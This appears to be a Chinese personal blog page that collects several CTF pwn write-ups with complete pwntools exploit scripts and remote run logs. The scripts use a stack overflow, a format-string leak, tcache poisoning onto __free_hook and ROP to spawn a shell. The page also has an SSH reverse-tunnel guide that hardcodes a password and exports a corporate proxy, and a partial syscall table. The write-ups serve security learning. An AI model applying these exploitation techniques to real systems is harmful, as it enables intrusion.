A4x7eq28'Blog

把本地可用的Proxy代理服务器带到ssh远程服务器上

2023-06-17T06:31:34.000Z

假如本地机器A在公司内网，可以通过代理服务器proxy.corp.com:8080科学上网。
ssh登录到阿里云的机器B，由于不在公司内网，默认情况下无法通过proxy.corp.com:8080科学上网。
这篇文章介绍，如何实现在机器B(阿里云的远程服务器）上，也能通过proxy.corp.com:8080科学上网。

1. 使用下面的脚本ssh登录阿里云的服务器B

#!/bin/bash
#>>>    Author:         Simon Huang
#>>>    Mail:           thelongestusernameofall@gmail.com
#>>>    Created Time:   Wed 25 Sep 2013 08:30:06 AM CST
expect -c "set timeout -1;
            spawn -noecho ssh -R 8080:127.0.0.1:8080 username@aliyun-ip-address -p 2222;
            expect *assword:*;
            send user-password\r;
            interact;";

这个命令不仅实现了ssh登录，还同时把本地的8080端口映射到了B机器（阿里云）的8080上。
这样在B机器上，所有往返8080端口的数据都会转发到A机器的8080端口上。

2. 在A机器上，将8080端口映射到proxy.corp.com:8080

2.1 安装haproxy

brew install haproxy

2.2 配置haproxy

global
    log stdout format raw local0

defaults
    mode http
    option httplog
    timeout connect 5000ms
    timeout client 50000ms
    timeout server 50000ms

frontend http_front
   bind *:8080
   default_backend http_back

backend http_back
   server proxy_server proxy.corp.com:8080

注意上面的配置，只需要根据实际情况修改代理服务器地址(即proxy.corp.com:8080）即可。其他内容一般情况下不用改动。
将该内容保存到/usr/local/etc/haproxy.cfg （默认无此文件，新建即可）

2.3 启动haproxy

haproxy -f /usr/local/etc/haproxy.cfg

#注意该命令不会自动启动为服务或者到后台。ctrl-c快捷键或关掉shell即可杀死。
#当不需要代理时，杀死该进程即可。

3. 在B机器上(阿里云的远程服务器）上使用127.0.0.1:8080作为代理，即可。

export http_proxy=http://127.0.0.1:8080
export https_proxy=$http_proxy

#测试代理起作用
wget google.com

WriteUp: 2022DASCTF Apr X FATE: good_luck

2022-04-24T08:06:34.000Z

0x0 Checksec

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)

0x1 Reverse Enginnering

两处非常明显的漏洞，overflow函数中的stack overflow；fmt函数中的format string attack.

0x2 Analyze

format stirng attack里的字符串输入使用的gets,该函数读到0x0a即(换行符 \n)就会终止，而ROP Gadget中pop rdi;ret的地址中恰好包含0x0a，因此想要使用rop chain调用elf.plt['puts'],输出elf.got['puts']的计划落空。

想要leak libc, 这里还可以通过format string attack。

在leak libc之后，再使用stack overflow 劫持控制流，执行one gadget.

0x3 Exploit Code

#!python3
from os import remove
from pwn import *
from LibcSearcher import *

context.clear(arch='amd64', os='linux')
elf = context.binary = ELF("bin")
libc = elf.libc

context.terminal = ["tmux", "split", "-h"]

if args.LOG:
    context.log_level = 'debug'

gs = '''
set breakpoint pending on
# b *0x40089F
b printf 
continue
'''
# =============================================================================

def start():
    if args.GDB:
        # return gdb.debug(elf.path, gdbscript=gs)
        return process(elf.path)
    elif args.REMOTE:
        #64.27.6.187 8888
        # return remote('64.27.6.187', 8888)
        return remote('39.99.242.16', 10000)
    else:
        return process(elf.path)

sla = lambda a, b: io.sendlineafter(a, b)
sa = lambda a, b: io.sendafter(a, b)
rl = lambda: p.recvline()

def good_start():
    while(True):
        io = start()
        io.recvuntil(b'>>\ngood luck\n')
        ctn = io.recvline()
        if ctn == b"luck!\n":
            return io
        else:
            io.close()
            continue
        
    return io
# =============================================================================

rop_rdi_ret = 0x400a23  # pop rdi ; ret
rop_rsi_r15_ret = 0x400a21 # pop rsi ; pop r15 ; ret
rop_ret = 0x40028e # ret

io = good_start()
if args.GDB:
    gdb.attach(io, gdbscript=gs)

io.timeout = 3000 

payload = b'a'*80 + p64(0xbeadbeef) #ebp

# payload += p64(rop_ret)
payload += p64(elf.sym.fmt)  #+ p64(rop_ret)
payload += p64(elf.sym.overflow)*2

# payload = b"a"*80 + p64(0xbeadbeef) + p64(0xbeadbeef)

io.sendline(payload)

io.recvuntil(b"fmt\n")
payload = b"%7$s".ljust(8, b'a') + p64(elf.got['puts'])
io.sendline(payload)
puts_addr = u64(io.recv(6).ljust(8, b'\x00'))
log.success('puts_addr: ' + hex(puts_addr))
# 通过puts_addr到https://libc.blukat.me/查询libc版本

libc.address = puts_addr - libc.sym['puts']

log.success('libc_base: ' + hex(libc.address))

payload = b'a'*80 + p64(0xbeadbeef)
# payload += p64(0x4527a + libc.address)
payload += p64(0x45226 + libc.address)


# payload = b'a'*80 + p64(0xbeadbeef) + p64(0xbeadbeef)
io.recvuntil(b"luck!\n")
io.sendline(payload)
# =============================================================================
io.sendline(b'cat flag.txt')
io.recvuntil(b'luck!\n')
flag = io.recvline()
log.success('flag: {}'.format(flag))

# io.interactive()
io.close()

0x4 Output Example

─$ python xpl.py REMOTE
[*] '2022DASCTF/good_luck/bin'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x3fe000)
[*] 'libs/2.23-0ubuntu11.3_amd64/libc-2.23.so'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to 39.99.242.16 on port 10000: Done
[*] Closed connection to 39.99.242.16 port 10000
[+] Opening connection to 39.99.242.16 on port 10000: Done
[*] Closed connection to 39.99.242.16 port 10000
[+] Opening connection to 39.99.242.16 on port 10000: Done
[*] Closed connection to 39.99.242.16 port 10000
[+] Opening connection to 39.99.242.16 on port 10000: Done
[*] Closed connection to 39.99.242.16 port 10000
[+] Opening connection to 39.99.242.16 on port 10000: Done
[+] puts_addr: 0x7f95247f46a0
[+] libc_base: 0x7f9524785000
[+] flag: b'DASCTF{7312255e-7b8a-4664-9a9f-3f67671452d7}\n'
[*] Closed connection to 39.99.242.16 port 10000

0x5 The Challenge

https://buuoj.cn/match/matches/95/challenges#good_luck

WriteUp: ciscn_2019_sw_7

2022-04-20T05:50:22.000Z

0x0 Checksec

Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled

0x1 Reverse Enginnering

该程序的漏洞点在New Note操作时, 若输入的Note size为0时，判定语句产生Integer Underflow；使得，Note Content可绕过size的判断而输入任意长度的内容；进而产生Heap Overflow.

unsigned __int64 __fastcall sub_A60(char *outBuffer, __int64 size, char endChar)
{
  char buf; // [rsp+2Fh] [rbp-21h] BYREF
  unsigned __int64 i; // [rsp+30h] [rbp-20h]
  ssize_t v7; // [rsp+38h] [rbp-18h]
  char *outBuffer_; // [rsp+40h] [rbp-10h]
  unsigned __int64 v9; // [rsp+48h] [rbp-8h]

  v9 = __readfsqword(0x28u);
  v7 = 0LL;
  outBuffer_ = outBuffer;
  for ( i = 0LL; size - 1 > i; ++i )            // underflow attack when size==0
  {
    v7 = read(0, &buf, 1uLL);
    if ( v7 <= 0 )
      exit(1);
    if ( buf == endChar )
      break;
    outBuffer_[i] = buf;
  }
  outBuffer_[i] = 0;
  return i;
}

0x2 Analyze

攻击过程

新增Note A, 使A->size = 0，从而chunk_A->size = 0x20,它在heap最上边。
新增9个Note, BCDE FGHI J, 它们的size = 0x40, 从而它们chunk->size = 0x50,依次在chunk A的下方邻近排列
通过A实施heap overflow attack，篡改B_DE FGHI J的chunk->size为0xa0,即原本0x50的二倍。从而B_DE FGHI J都会覆盖后面的chunk一部分。
逆序释放BCDE FGHI J，即先后按J IHGF EDCB的顺序释放9个chunk.

实际上，主要J必须释放到T-cache中不能释放到unsorted bin中，否则会被其后紧邻的top chunk吃掉(forward consolidate); B最好释放到unsorted bin中，这样通过A进行篡改会更加方便。
此时的堆布局：

//
// T-cache
// 0xa0: D->E->F->G->H->I->J
// 0x50: C
// unsortedbin: B(0xa0)
//

实际上，chunk C是完全被chunk B覆盖的。
5. 将C新增成为Note(将会消耗点T-cache 0x50 bin : C)；之后再次申请0x50 size的chunk，这时由于T-cache中已经无0x50的chunk，在unsorted bin中有0xa0的chunk，将会触发malloc remaindering, 即将unsortedbin: B(0xa0)分割出来一个0x50的chunk给当前的请求。剩下的remainder部分放回unsorted bin中。请求分配出去的部分，成为New Note B, 而放回到unsorted bin的部分，恰好和C Note重叠。这样通过读取Note C的内容，就可以leak unsorted bin ->fd (即 &main_arena->top_chunk ).
6. 读C内容，并计算出libc的偏移。
7. 将chunk B释放到T-cache 0x50 bin中。
8. 通过note A修改B->fd为__free_hook的地址。这将会把__free_hook所处内存块加入到t-cache链中。
9. 申请两次chunk-size = 0x50的note, 那么第二次的memory chunk即为__free_hook的chunk,修改_free_hook的值为system函数地址.
10. free一个/bin/sh\0的内存chunk，即可获取shell.

0x3 Exploit Code

#!python3
from pwn import *
from LibcSearcher import *

context.clear(arch='amd64', os='linux')
elf = context.binary = ELF("bin")
libc = elf.libc

context.terminal = ["tmux", "split", "-h"]

if args.LOG:
    context.log_level = 'debug'

gs = '''
set breakpoint pending on
b system
# b *0x555555400BD3
continue
'''
# =============================================================================

def start():
    if args.GDB:
        # args['NOASLR'] = True
        return gdb.debug(elf.path, gdbscript=gs)
    elif args.REMOTE:
        return remote('node4.buuoj.cn', 27251)
    else:
        return process(elf.path)

sla = lambda a, b: io.sendlineafter(a, b)
sa = lambda a, b: io.sendafter(a, b)
rl = lambda: io.recvline()
sl = lambda data: io.sendline(data)

noteID = [0]*10
def addNote(size, content):
    global noteID
    # sla(b'>', b'1')
    sl(b'1')
    sla(b'size of note:', str(size).encode())
    sla(b"content of note:", content)
    io.recvuntil(b"What's this?[")
    offset = io.recvuntil(b"]\n",drop=True)
    id = 0
    for i in range(len(noteID)):
        if noteID[i] == 0:
            noteID[i] = int(offset, 16) #低三byte都是0概率小，不特殊处理
            id = i
            break
    # time.sleep(0.1)
    return id   

def showNote(id):
    # sla(b'>', b'2')
    sl(b'2')
    sla(b'Index:', str(id).encode())
    io.recvuntil( b" : ")
    return io.recvuntil(b"\nDone.",drop=True)

def freeNote(id):
    global noteID
    # sla(b'>', b'4')
    sl(b'4')
    sla(b'Index:', str(id).encode())
    noteID[id] = 0
   

# =============================================================================

io = start()
io.timeout = 3000 

A = addNote(0, b'A'*0x10) # 0x20 chunk
nlst = [addNote(0x40, b'Note') for i in range(9)] #BCDE FGHI J

freeNote(A)
Actn = 2*p64(0) + p64(0xa1) + (9*p64(0) + p64(0x51)) + 7*(9*p64(0) + p64(0xa1)) + p64(0)*2 
# C->size keep 0x51
#last two p64 more to avoid \0 overwrite change our data
A = addNote(0, Actn)

# 最后一个chunk和top_chunk邻接。释放到t-cache中，
# 若进unsorted-bin,会被top_chunk back-consolidate 吃掉。= =!!
nlst.reverse()
[freeNote(i) for i in nlst]
## now: 
#  T-cache 
#       0xa0: D->E->F->G->H->I->J
#       0x50: C 
# unsortedbin: B(0xa0)
##

C = addNote(0x40, b'C'*0x10)
#trigger B remainderring, C will be the remainder and linked into unsortedbin
B = addNote(0x40, b'B') 

Cctn = showNote(C)
log.info('Cctn: {}'.format(Cctn))
arena = u64(Cctn.ljust(8, p8(0))) - 0x60
log.info('arena: {}'.format(hex(arena)))
libc.address = arena - (libc.sym.__malloc_hook + 0x10)
log.success('libc.address: {}'.format(hex(libc.address)))

freeNote(B) #0x50 tcache bin

freeNote(A)
Actn = 16*b'a' + p64(0x51) + p64(libc.sym.__free_hook - 8)  
A = addNote(0, Actn)
freeNote(A)

B = addNote(0x40, b'B')
freeHookMem = addNote(0x40, p64(libc.sym.system))

Actn = 16*b'a' + p64(0x51) + b'/bin/sh\0'
A = addNote(0, Actn)

freeNote(B)

# =============================================================================
#got shell
time.sleep(0.1)
sl(b'cat flag')
flag = rl()
log.info('flag: {}'.format(flag))
# io.interactive()
io.close()

0x4 Output Example

╰─$ python xpl.py REMOTE
[*] 'ciscn_2019_sw_7/bin'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] 'libc-2.27.so'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to node4.buuoj.cn on port 27251: Done
[*] Cctn: b'\xa0,\xe3\xcf\x8d\x7f'
[*] arena: 0x7f8dcfe32c40
[+] libc.address: 0x7f8dcfa47000
[*] flag: b'flag{d0bc3973-****-40d6-****-984b84217efa}\n'
[*] Closed connection to node4.buuoj.cn port 27251

0x5 The Challenge

https://buuoj.cn/challenges#ciscn_2019_sw_7

WriteUp: Baby Tcache (ciscn_2019_n_2)

2022-04-18T19:15:03.000Z

0x0 Checksec

Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      No PIE (0x3fe000)

0x1 Reverse Enginnering

很简单的程序，

0x2 Analyze

主要过程

1. delete函数有double free漏洞
1. 利用double free构造Write After Free
1. 利用Write After Free修改T-cache中chunk，从而构造任意地址写
1. 由于需要泄露libc地址，因此，利用任意地址写，控制chunkList指针数组(即User数组)
1. 通过变更chunkList数组中的指针指向got[printf], 然后display对应user信息，获取libc中printf函数地址，从而获取libc偏移
1. 通过变更chunkList数组中指针，指向libc.sym.__free_hook;edit对应user信息，从而将libc.sym.system写入__free_hook
1. 构造包含/bin/sh\0的chunk并delete该user,从而触发__free_hook.获取shell

0x3 Exploit Code

#!python3
from pwn import *
from LibcSearcher import *

context.clear(arch='amd64', os='linux')
elf = context.binary = ELF("bin")
libc = elf.libc

context.terminal = ["tmux", "split", "-h"]

if args.LOG:
    context.log_level = 'debug'

gs = '''
continue
'''

# ============================= Help Functions =======================================

def start():
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    elif args.REMOTE:
        return remote('node4.buuoj.cn', 26880)
    else:
        return process(elf.path)

sla = lambda s, p: io.sendlineafter(s, p)
sa = lambda s, p: io.sendafter(s, p)
sl = lambda s: io.sendline(s)
rl = lambda : io.recvline()

def create(name, age):
    sla(b'Your choice: ', b'1')
    sa(b'name:', name)
    sa(b'age:', str(age).encode())
    ctn = rl()
    idx = int(ctn[len("idx: "):-1])
    return idx

def delete(idx):
    sla(b'Your choice: ', b'2')
    sla(b'Index:', str(idx).encode())

def edit(idx, name, age):
    sla(b'Your choice:', b'3')
    sla(b'Index:', str(idx).encode())
    sa(b'name:', name)
    sla(b'age:', str(age).encode())

def display(idx):
    sla(b'Your choice:', b'4')
    sla(b'Index:', str(idx).encode())
    io.recvuntil(b'name: ',drop=True)
    name = io.recvuntil(b"\nage: ",drop=True)
    age = int(io.recvuntil(b"\nmoney: ",drop=True))
    money = int(io.recvuntil(b"\n-----",drop=True))
    return name, age, money

def add_money(idx):
    sla(b'Your choice:', b'5')
    sla(b'Index:', str(idx).encode())

def buy_gift(idx, address=None, size=None):
    sla(b'Your choice:', b'6')
    sla(b'Index:', str(idx).encode())
    ctn = io.recv(2)
    data = None
    if ctn == b':(' or address is None  or size is None:
        return data
    else:
        sla(b"the address you want to leak:", address)
        sla(b"the size you want to leak:", str(size).encode())
        io.recvuntil(b'data:[[[',drop=True)
        data = io.recvuntil(b']]]\n',drop=True)
        return data

def leave():
    sla(b'Your choice:', b'7')
    
# ============================= Payload ===================================
io = start()
io.timeout = 3000 


log.info(f"chunkList: {hex(elf.sym.chunkList)}")

A = create(b'A', 0x10) # 0
B = create(b'B', 0x10) # 1
delete(A)   
delete(B)    

B0 = create(b'B', 0x10) # 0
delete(B) 

B0name, B0age, B0money = display(B0)
Aaddr = u64(B0name.ljust(8, b'\0')) - 0x10
Baddr = Aaddr + 0x20

edit(B0, p64(elf.sym.chunkList), 0x10) # 

B = create(b'/bin/sh\0', 0x111111) # 1
T = create(p64(Baddr + 0x10), elf.got['printf']) # 2 # change 0,1 pointer 

libc_printf, _, _ = display(1)
libc_printf = u64(libc_printf.ljust(8, b'\0'))
log.info(f"libc_printf: {hex(libc_printf)}")
libc.address = libc_printf - libc.sym['printf']
log.success(f"libc.address: {hex(libc.address)}")

edit(T, p64(Baddr + 0x10), libc.sym.__free_hook) #
edit(1, p64(libc.sym.system), libc.sym.system)

delete(0)

# ============================= Get Shell ========================================
time.sleep(0.2)
sl(b"cat flag")
flag = rl()
log.success(f"flag: {flag}")

# io.interactive()
io.close()

0x4 Output Example

╰─$ python xpl.py REMOTE                                                                                                                                                                1 ↵
[*] 'ciscn_2019_n_2/bin'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x3fe000)
[*] 'libc-2.27.so'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to node4.buuoj.cn on port 26880: Done
[*] chunkList: 0x602060
[*] libc_printf: 0x7fa3a8db6e80
[+] libc.address: 0x7fa3a8d52000
[+] flag: b'flag{a7b5d398-\\\\-4e6a-////-30ab65387675}\n'
[*] Closed connection to node4.buuoj.cn port 26880

0x5 The Challenge

https://buuoj.cn/challenges#ciscn_2019_n_2

WriteUp: w0odpeck3r's Nest

2022-04-18T10:08:10.000Z

0x0 Checksec

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      No PIE (0x400000)

0x1 Reverse Enginnering

unsigned __int64 decoratenest()
{
  int idx; // [rsp+Ch] [rbp-14h]
  char buf[8]; // [rsp+10h] [rbp-10h] BYREF
  unsigned __int64 v3; // [rsp+18h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  printf("Index :");
  read(0, buf, 4uLL);
  idx = atoi(buf);
  if ( idx < 0 || idx > 9 )
  {
    puts("OOB!My Boy!");
    _exit(0);
  }
  if ( nests[idx] )
  {
    printf("what stuff you wanna put in the nest?");
    myread(nests[idx]->pointer, nests[idx]->size + 1);// offbyone attack
    puts("Done !");
  }
  else
  {
    puts("No such nest !");
  }
  return __readfsqword(0x28u) ^ v3;
}

漏洞发生在decoratenest函数中，在写调用myread写nests[idx]->pointer时, size超出1 byte，因此会造成off by one attack。

0x2 Analyze

gdb调试后，确实是libc-2.27.so上的off-by-one attack, 有t-cache存在。通过heap 风水布局内存，形成内存chunk的overlay, 从而形成Read After Free以leak libc, Write After Free以修改T-cache链，达到任意地址写。

将libc.sym.system写入__free_hook,将/bin/sh\x00写入某chunk,最后free该chunk，即可get shell.

0x3 Exploit Code

#!python3
from pwn import *
from LibcSearcher import *

context.clear(arch='amd64', os='linux')
elf = context.binary = ELF("bin")
libc = elf.libc

context.terminal = ["tmux", "split", "-h"]
# context.log_level = 'debug'

gs = '''
# set breakpoint pending on
# b system
# b *__free_hook
continue
'''
def start():
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    elif args.REMOTE:
        return remote('node4.buuoj.cn', 28213)
    else:
        return process(elf.path)

sla = lambda x,ctn: io.sendlineafter(x, ctn)
sa = lambda x, value: io.sendafter(x, value)

nestId = [0] * 10
def build(full, data):
    global nestId
    sla(b'Your choice :', b'1')
    sla(b"how big is the nest ?", str(full).encode())
    sa(b"what stuff you wanna put in the nest?", data)
    
    id = -1
    for i in range(10):
        if nestId[i] == 0:
            id = i
            nestId[i] = 1
            break
    
    return id

def decorate(id, data):
    sla(b'Your choice :', b'2')
    sla(b"Index :", str(id).encode())
    sa(b"what stuff you wanna put in the nest?", data)

def show(id):
    sla(b'Your choice :', b'3')
    sla(b"Index :", str(id).encode())
    io.recvuntil(b"Size : ")
    size = int(io.recvuntil(b"\n", drop=True))
    io.recvuntil(b"Decorations : ")
    data = io.recvuntil(b"\nDone !\n", drop=True)
    return size, data

def crash(id):
    global nestId
    sla(b'Your choice :', b'4')
    sla(b"Index :", str(id).encode())
    nestId[id] = 0

def leave():
    sla(b'Your choice :', b'5')

# ================================================================================
io = start()

io.timeout = 3000 

full = 0xa0 - 8
half = 0x50 - 8

A = build(0x18, b'A')
B = build(0x18, b'B')

crash(B)
crash(A)

A = build(half, b'A')
B = build(half, b'B')
C = build(half, b'C')
D = build(half, b'D')   # D的目的是保证C-size被篡改成full后，依然是和前后的chunk对齐的

# 将B，C的size给篡改成full; 从而实现：B后半覆盖C前半、C后半覆盖D 
decorate(A, b'A'*half + p8(full + 8 + 1))
decorate(B, b'B'*half + p8(full + 8 + 1))

crash(B)
B = build(full, b'B' )
# B：  

crash(D)

## 填满t-cache : full
fill = []
for i in range(7):
    fill.append(build(full, b'F'))

for i in range(7):
    crash(fill[i])

# free C into unsorted bin
crash(C)

# 填充B的内容一直到C->fd，从而读出 C->fd, 该值为 &main_arena->top
decorate(B, b'B'*(half+8))
Bsize, Bdata = show(B)
# log.info(f"Bszie : {Bsize}, Bdata : {Bdata}")

arena = u64(Bdata[half+8:].ljust(8,b'\0') ) - 0x60
log.success(f"arena : {hex(arena)}")

# 从泄露的&main_arena->top计算出libc偏移
libc.address = arena - (libc.sym['__malloc_hook'] + 0x10) #&main_arena = &__malloc_hook + 0x10

decorate(B, b'B'*half + p64(half+8+1)) #将C的chunk-size改为half + 8 + 1
# bins of half size: 
#   1.  t-cache : D(size=half)
#   2.  unsorted-bin : C(size=half)
D = build(half, b'D') #消耗掉t-cache
C = build(half, b'C') #消耗掉unsorted-bin

crash(D)  # 
crash(C)  # C被free进T-cache; 现在可以通过B控制T-cache中的Chunk，从而实现任意地址写。
decorate(B, b'B'*(half) + p64(half+8+1) + p64(libc.sym.__free_hook) )

C = build(half, b'/bin/sh\0')
free_hook_chunk = build(half, p64(libc.sym.system))
crash(C)

# =============================================================================
## got shell
time.sleep(0.2) # wait system(sh)
io.sendline(b"cat flag")
ctn = io.recv()
log.success(f"flag : {ctn}")

# io.sendline(b"exit")
# leave()
io.close()
# io.interactive()

0x4 Output Example

╰─$ python xpl.py REMOTE                                                     
[*] 'ciscn_2019_n_4/bin'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x3fe000)
[*] 'libs/2.27-3ubuntu1_amd64/libc-2.27.so'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to node4.buuoj.cn on port 28213: Done
[+] arena : 0x7f4cf5608c40
[+] flag : b'flag{af93cac8-****-4250-****-31627e1ebe9a}\n'
[*] Closed connection to node4.buuoj.cn port 28213

0x5 The Challenge

https://buuoj.cn/challenges#ciscn_2019_n_4

WriteUp: SECPROG calculator

2022-04-16T18:55:21.000Z

0x0 Checksec

╰─$ checksec calc
[*] 'pwnable_calc/calc'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

注意： Stack: Canary found. 直接stack overflow会破坏Canary, 需要泄露Canary，并在stack overflow时，将Canary修复在正确的位置

0x1 Reverse Enginnering

经过分析，程序至少存在两处漏洞：

a. 当开头为运算符号时，会修改pool[0]的值，该值作为运算时pool数组的下标使用，通过修改该值，获得任意地址读和任意地址写的漏洞。e.g. +111111
b. 当运算符号为’±’、’*/%'两组交替时，会让运算符数组不断曾长，超过100时，产生栈溢出。e.g. payload = b'1*2+'*100+b'1'

0x2 Analyze

由于运算符中的值只能是+-*/%（实际上除最后一个字符外只有±），那么很难实现运算符溢出的利用。

因此，我们使用+1111形式的payload,通过任意读和任意写,将栈溢出脚本写入到栈中。

应注意python中ctypes的使用，进行int32的转换。

0x3 Exploit Code

#!python3
from pwn import *
from pwnlib.util import misc
import os

import ctypes

elf = context.binary = ELF("bin")
libc = elf.libc

context.clear(arch='i386', os='linux',kernel='amd64')
context.terminal = ["tmux", "split", "-h"]
# context.log_level = 'debug'


gs = '''
continue
'''
def start():
    if args.GDB:
        p = process(elf.path)
        cmd = ["gdb", "-p", str(p.pid)]
        cmd = context.terminal + cmd
        cmd = ' '.join(cmd) 
        os.system(cmd)
        time.sleep(1)
        return p
    elif args.REMOTE:
        return remote('node4.buuoj.cn', 28496)
    else:
        return process(elf.path)


def leak(payload):
    io.sendline(payload)
    ctn = io.recvline()
    result = int(ctn[:-1], 10) & 0xffffffff
    return ctypes.c_int32(result).value

def write(addr_offset, value):
    ## 1. addr_offset 地址中的值
    payload_lk = f"+{addr_offset}".encode()
    old_value = leak(payload_lk)

    ## 2. 将新值写入
    # value = ctypes.c_int32(value).value
    payload = f"+{addr_offset}" #pool[0] = addr_offset, pool[1] = addr_offset
    # 使用+, - 实现最终pool[addr_offset]中的值为value, 因此计算addr_offset和value的差值
    if old_value == value:
        return 
    elif old_value < value:
        payload += f"+{value - old_value}"
    else:
        payload += f"-{old_value - value}"

    io.sendline(payload.encode())
    ctn = io.recvline()

    now_value = leak(payload_lk)
    if now_value != value:
        print(f"write failed: {addr_offset} {value} {now_value}")
        exit(1)
    
#--------- Process Interactive ---------------------

io = start()
io.timeout = 3000 #for debugging

payload = b"1+1"
io.recvuntil(b'\n') #=== Welcome to SECPROG calculator ===

""" calc stack 
-000005A0 pool            dd 101 dup(?)                -----------|----------------------|
-0000040C expr            db 1024 dup(?)         1               357*size_of(int)        |    
-0000000C cannary         dd ?                   2     -----------|                      |
...                                                                           (0x5a0 + 4) = 0x5a4 = 361*size_of(int)
+00000000  s              db 4 dup(?)          360                                       | 
+00000004  r              db 4 dup(?)          361     ----------------------------------|
"""

ebp_value = leak(b"+360")
log.info(f"ebp_value: {hex(ebp_value & 0xffffffff)}")

#write /bin/sh to  locatoin just above ebp
#0x6e69622f   0x68732f   /bin/sh; /bin/sh's location would be ebp_value - 0x28 (get the offset by gdb debugging)
write(358, 0x6e69622f)
write(359, 0x68732f)
binsh = ebp_value & 0xffffffff - 0x28

rop = ROP(elf)
int80 = rop.find_gadget(['int 0x80'])
rop.raw(rop.eax)
rop.raw(0xb)
# rop.raw(rop.ebx)
# rop.raw(binsh)
rop.raw(rop.ecx)
rop.raw(0)
rop.raw(binsh)
rop.raw(rop.edx)
rop.raw(0)
rop.raw(int80)

rop_bs = rop.chain()
print(rop_bs)
print(rop.dump())

offset = 361
for i in range(0, len(rop_bs), 4):
    ai32 = u32(rop_bs[i:i+4])
    ai32 = ctypes.c_int32(ai32).value
    write(offset, ai32)
    offset += 1


io.sendline()
# =============================================================================
# io.interactive()
## got shell
time.sleep(3)
io.sendline(b"cat flag")
flag = io.recvline()
log.info(f"flag: {flag}")
io.close()

0x4 Output Example

╰─$ python exp.py REMOTE
[*] 'pwnable_calc/bin'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[+] Opening connection to node4.buuoj.cn on port 28496: Done
[*] ebp_value: 0xffd17cf8
[*] Loaded 91 cached gadgets for 'bin'
b'K\xc3\x05\x08\x0b\x00\x00\x00\xd1\x01\x07\x08\x00\x00\x00\x00\xd0|\xd1\xff\xaa\x01\x07\x08\x00\x00\x00\x00!\x9a\x04\x08'
0x0000:        0x805c34b pop eax; ret
0x0004:              0xb
0x0008:        0x80701d1 pop ecx; pop ebx; ret
0x000c:              0x0
0x0010:       0xffd17cd0
0x0014:        0x80701aa pop edx; ret
0x0018:              0x0
0x001c:        0x8049a21 int 0x80
[*] flag: b'flag{3ec****4-73f2-4c1e-8623-be****20ba24}\n'
[*] Closed connection to node4.buuoj.cn port 28496

0x5 The Challenge

https://buuoj.cn/challenges#pwnable_calc

System Call Table - x86_64

2022-04-13T12:04:41.000Z

syscall number	syscall	%rax	%rdi	%rsi	%rdx	%rcx	%r8	%r9
0	sys_read	0	unsigned int fd	char *buf	size_t count
1	sys_write	1	unsigned int fd	const char *buf	size_t count
2	sys_open	2	const char *filename	int flags	int mode
3	sys_close	3	unsigned int fd
4	sys_stat	4	const char *filename	struct stat *statbuf
5	sys_fstat	5	unsigned int fd	struct stat *statbuf
6	sys_lstat	6	fconst char *filename	struct stat *statbuf
7	sys_poll	7	struct poll_fd *ufds	unsigned int nfds	long timeout_msecs
8	sys_lseek	8	unsigned int fd	off_t offset	unsigned int origin
9	sys_mmap	9	unsigned long addr	unsigned long len	unsigned long prot	unsigned long flags	unsigned long fd	unsigned long off
10	sys_mprotect	A	unsigned long start	size_t len	unsigned long prot
11	sys_munmap	B	unsigned long addr	size_t len
12	sys_brk	C	unsigned long brk
13	sys_rt_sigaction	D	int sig	const struct sigaction *act	struct sigaction *oact	size_t sigsetsize
14	sys_rt_sigprocmask	E	int how	sigset_t *nset	sigset_t *oset	size_t sigsetsize
15	sys_rt_sigreturn	F	unsigned long __unused
16	sys_ioctl	10	unsigned int fd	unsigned int cmd	unsigned long arg
17	sys_pread64	11	unsigned long fd	char *buf	size_t count	loff_t pos
18	sys_pwrite64	12	unsigned int fd	const char *buf	size_t count	loff_t pos
19	sys_readv	13	unsigned long fd	const struct iovec *vec	unsigned long vlen
20	sys_writev	14	unsigned long fd	const struct iovec *vec	unsigned long vlen
21	sys_access	15	const char *filename	int mode
22	sys_pipe	16	int *filedes
23	sys_select	17	int n	fd_set *inp	fd_set *outp	fd_set*exp	struct timeval *tvp
24	sys_sched_yield	18
25	sys_mremap	19	unsigned long addr	unsigned long old_len	unsigned long new_len	unsigned long flags	unsigned long new_addr
26	sys_msync	1A	unsigned long start	size_t len	int flags
27	sys_mincore	1B	unsigned long start	size_t len	unsigned char *vec
28	sys_madvise	1C	unsigned long start	size_t len_in	int behavior
29	sys_shmget	1D	key_t key	size_t size	int shmflg
30	sys_shmat	1E	int shmid	char *shmaddr	int shmflg
31	sys_shmctl	1F	int shmid	int cmd	struct shmid_ds *buf
32	sys_dup	20	unsigned int fildes
33	sys_dup2	21	unsigned int oldfd	unsigned int newfd
34	sys_pause	22
35	sys_nanosleep	23	struct timespec *rqtp	struct timespec *rmtp
36	sys_getitimer	24	int which	struct itimerval *value
37	sys_alarm	25	unsigned int seconds
